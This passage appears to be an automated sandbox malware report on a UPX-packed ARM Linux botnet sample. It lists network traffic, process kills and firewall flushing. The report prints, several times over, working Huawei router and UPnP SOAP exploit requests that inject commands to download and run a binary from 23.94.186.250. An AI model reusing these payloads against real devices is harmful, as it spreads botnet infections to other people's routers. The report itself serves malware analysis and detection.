75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
              Source: unknownTCP traffic detected without corresponding DNS query: 197.27.35.12
              Source: unknownTCP traffic detected without corresponding DNS query: 156.206.45.17
              Source: unknownTCP traffic detected without corresponding DNS query: 41.223.38.12
              Source: unknownTCP traffic detected without corresponding DNS query: 197.103.171.13
              Source: unknownTCP traffic detected without corresponding DNS query: 156.106.106.123
              Source: unknownTCP traffic detected without corresponding DNS query: 156.56.62.32
              Source: unknownTCP traffic detected without corresponding DNS query: 197.148.150.72
              Source: unknownTCP traffic detected without corresponding DNS query: 156.85.150.89
              Source: unknownTCP traffic detected without corresponding DNS query: 156.158.36.3
              Source: unknownTCP traffic detected without corresponding DNS query: 197.33.236.165
              Source: unknownTCP traffic detected without corresponding DNS query: 156.6.117.221
              Source: unknownTCP traffic detected without corresponding DNS query: 41.213.70.88
              Source: unknownTCP traffic detected without corresponding DNS query: 197.207.114.50
              Source: unknownTCP traffic detected without corresponding DNS query: 41.216.202.144
              Source: unknownTCP traffic detected without corresponding DNS query: 156.44.151.171
              Source: unknownTCP traffic detected without corresponding DNS query: 197.57.109.100
              Source: unknownTCP traffic detected without corresponding DNS query: 156.140.26.188
              Source: unknownTCP traffic detected without corresponding DNS query: 197.60.153.1
              Source: unknownTCP traffic detected without corresponding DNS query: 156.246.44.139
              Source: unknownTCP traffic detected without corresponding DNS query: 197.26.196.153
              Source: unknownTCP traffic detected without corresponding DNS query: 41.6.66.211
              Source: unknownTCP traffic detected without corresponding DNS query: 41.95.96.83
              Source: unknownTCP traffic detected without corresponding DNS query: 156.216.219.44
              Source: unknownTCP traffic detected without corresponding DNS query: 41.229.33.193
              Source: unknownTCP traffic detected without corresponding DNS query: 197.71.118.104
              Source: unknownTCP traffic detected without corresponding DNS query: 41.231.138.107
              Source: unknownTCP traffic detected without corresponding DNS query: 41.214.230.97
              Source: unknownTCP traffic detected without corresponding DNS query: 197.76.34.188
              Source: unknownTCP traffic detected without corresponding DNS query: 156.191.121.146
              Source: unknownTCP traffic detected without corresponding DNS query: 197.141.199.13
              Source: unknownTCP traffic detected without corresponding DNS query: 41.239.199.243
              Source: unknownTCP traffic detected without corresponding DNS query: 41.164.189.192
              Source: unknownTCP traffic detected without corresponding DNS query: 156.55.170.229
              Source: unknownTCP traffic detected without corresponding DNS query: 197.197.25.80
              Source: unknownTCP traffic detected without corresponding DNS query: 41.41.41.23
              Source: unknownTCP traffic detected without corresponding DNS query: 197.186.193.155
              Source: unknownTCP traffic detected without corresponding DNS query: 41.150.131.120
              Source: unknownTCP traffic detected without corresponding DNS query: 41.20.36.229
              Source: unknownTCP traffic detected without corresponding DNS query: 41.224.88.73
              Source: unknownTCP traffic detected without corresponding DNS query: 156.96.137.169
              Source: unknownTCP traffic detected without corresponding DNS query: 41.93.81.214
              Source: unknownTCP traffic detected without corresponding DNS query: 41.39.37.132
              Source: unknownTCP traffic detected without corresponding DNS query: 156.116.228.254
              Source: unknownTCP traffic detected without corresponding DNS query: 197.75.39.78
              Source: unknownTCP traffic detected without corresponding DNS query: 156.142.7.180
              Source: unknownTCP traffic detected without corresponding DNS query: 197.166.28.247
              Source: unknownTCP traffic detected without corresponding DNS query: 197.55.1.205
              Source: unknownTCP traffic detected without corresponding DNS query: 197.236.107.244
              Source: unknownTCP traffic detected without corresponding DNS query: 197.134.150.205
              Source: unknownTCP traffic detected without corresponding DNS query: 197.75.45.63
              Source: arm7, 5234.1.00000000f6abff04.000000008642ee32.r-x.sdmpString found in binary or memory: http://23.94.186.250/..23091t/mips;
              Source: arm7, 5234.1.00000000f6abff04.000000008642ee32.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: arm7, 5234.1.00000000f6abff04.000000008642ee32.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding//%22%3E
              Source: arm7, 5234.1.00000000f6abff04.000000008642ee32.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: arm7, 5234.1.00000000f6abff04.000000008642ee32.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
              Source: arm7String found in binary or memory: http://upx.sf.net
              Source: unknownHTTP traffic detected: POST /picsdesc.xml HTTP/1.1Content-Length: 630Accept-Encoding: gzip, deflateSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMappingAccept: /User-Agent: Hello-WorldConnection: keep-aliveData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 2f 25 32 32 25 33 45 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 63 68 6d 6f 64 20 2b 78 20 6d 69 70 73 3b 20 2e 2f 6d 69 70 73 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding//%22%3E<s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://23.94.186.250/..23091t/mips; chmod +x mips; ./mips</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
              Source: unknownDNS traffic detected: queries for: daisy.ubuntu.com

              System Summary:

              barindex
              Sample tries to kill many processes (SIGKILL)Show sources
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 658, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 720, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 759, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 772, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 789, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 800, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 904, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 936, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1320, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1334, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1335, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1389, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1809, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1872, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1888, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1983, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 2048, result: successful
              Source: /usr/bin/pkill (PID: 5294)SIGKILL sent: pid: 2258, result: successful
              Source: /usr/bin/pkill (PID: 5294)SIGKILL sent: pid: 4486, result: no such process
              Source: LOAD without section mappingsProgram segment: 0x8000
              Source: arm7, type: SAMPLEMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 658, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 720, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 759, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 772, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 789, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 800, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 904, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 936, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1320, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1334, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1335, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1389, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1809, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1872, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1888, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1983, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 2048, result: successful
              Source: /usr/bin/pkill (PID: 5294)SIGKILL sent: pid: 2258, result: successful
              Source: /usr/bin/pkill (PID: 5294)SIGKILL sent: pid: 4486, result: no such process
              Source: arm7Joe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
              Source: classification engineClassification label: mal100.spre.troj.evad.lin@0/9@2/0

              Data Obfuscation:

              barindex
              Sample is packed with UPXShow sources
              Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
              Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
              Source: initial sampleString containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

              Persistence and Installation Behavior:

              barindex
              Deletes all firewall rulesShow sources
              Source: /bin/sh (PID: 5277)Args: iptables -F
              Sample reads /proc/mounts (often used for finding a writable filesystem)Show sources
              Source: /bin/fusermount (PID: 5456)File: /proc/5456/mountsJump to behavior
              Source: /bin/sh (PID: 5284)Pkill executable: /usr/bin/pkill -> pkill -9 busybox
              Source: /bin/sh (PID: 5289)Pkill executable: /usr/bin/pkill -> pkill -9 perl
              Source: /bin/sh (PID: 5294)Pkill executable: /usr/bin/pkill -> pkill -9 python
              Source: /usr/share/gdm/generate-config (PID: 5446)Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
              Source: /usr/share/gdm/generate-config (PID: 5568)Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
              Source: /bin/sh (PID: 5430)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              Source: /bin/sh (PID: 5432)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              Source: /bin/sh (PID: 5434)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              Source: /bin/sh (PID: 5436)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              Source: /bin/sh (PID: 5438)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              Source: /bin/sh (PID: 5440)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
